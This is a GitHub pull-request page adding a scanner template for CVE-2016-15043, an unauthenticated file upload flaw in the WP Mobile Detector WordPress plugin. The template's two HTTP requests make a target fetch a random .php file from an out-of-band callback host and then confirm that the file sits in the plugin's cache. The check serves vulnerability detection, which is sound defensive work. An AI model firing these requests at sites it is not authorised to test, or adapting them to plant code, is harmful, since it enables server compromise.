Skip to content

Added CVE-2016-15043 template #14674

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
ritikchaddha merged 5 commits into from
Jan 6, 2026
Merged

Added CVE-2016-15043 template #14674

Changes from all commits
Commits
Show all changes
5 commits
Select commit Hold shift + click to select a range
f607906
Added CVE-2016-15043 template
D3nverNg Jan 2, 2026
b050ed6
Update CVE-2016-15043 template
D3nverNg Jan 2, 2026
bda9f74
Added CVE-2016-15043 template
D3nverNg Jan 2, 2026
028f8ef
Update CVE-2016-15043.yaml
pussycat0x Jan 6, 2026
c52024a
Update CVE-2016-15043.yaml
ritikchaddha Jan 6, 2026
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
56 changes: 56 additions & 0 deletions http/cves/2016/CVE-2016-15043.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,56 @@
id: CVE-2016-15043

info:
name: WP Mobile Detector <= 3.5 - Unrestricted File Upload
author: D3nverNg,thewindghost
severity: critical
description: |
WP Mobile Detector plugin for WordPress <= 3.5 contains an unrestricted file upload vulnerability caused by missing file type validation in resize.php, letting unauthenticated attackers upload arbitrary files, potentially leading to remote code execution.
impact: |
Unauthenticated attackers can upload arbitrary files, potentially leading to remote code execution and full server compromise.
remediation: |
Update to the latest version of WP Mobile Detector plugin.
reference:
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb
- https://www.pluginvulnerabilities.com/2016/05/31/aribitrary-file-upload-vulnerability-in-wp-mobile-detector/
- https://wpscan.com/vulnerability/e4739674-eed4-417e-8c4d-2f5351b057cf/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2016-15043
cwe-id: CWE-434
metadata:
verified: true
max-request: 2
tags: cve,cve2016,wordpress,wp,wp-plugin,file-upload,rce,intrusive,kev,vkev

variables:
filename: "{{rand_text_alpha(8)}}.php"

flow: http(1) && http(2)

http:
- raw:
- |
GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://{{interactsh-url}}/{{filename}} HTTP/1.1
Host: {{Hostname}}

matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "http")'
- 'contains(content_type, "image/gif")'
condition: and
internal: true

- raw:
- |
GET /wp-content/plugins/wp-mobile-detector/cache/{{filename}} HTTP/1.1
Host: {{Hostname}}

matchers:
- type: dsl
dsl:
- status_code == 200
- regex('<body>(.*?)</body>', body)
condition: and
Loading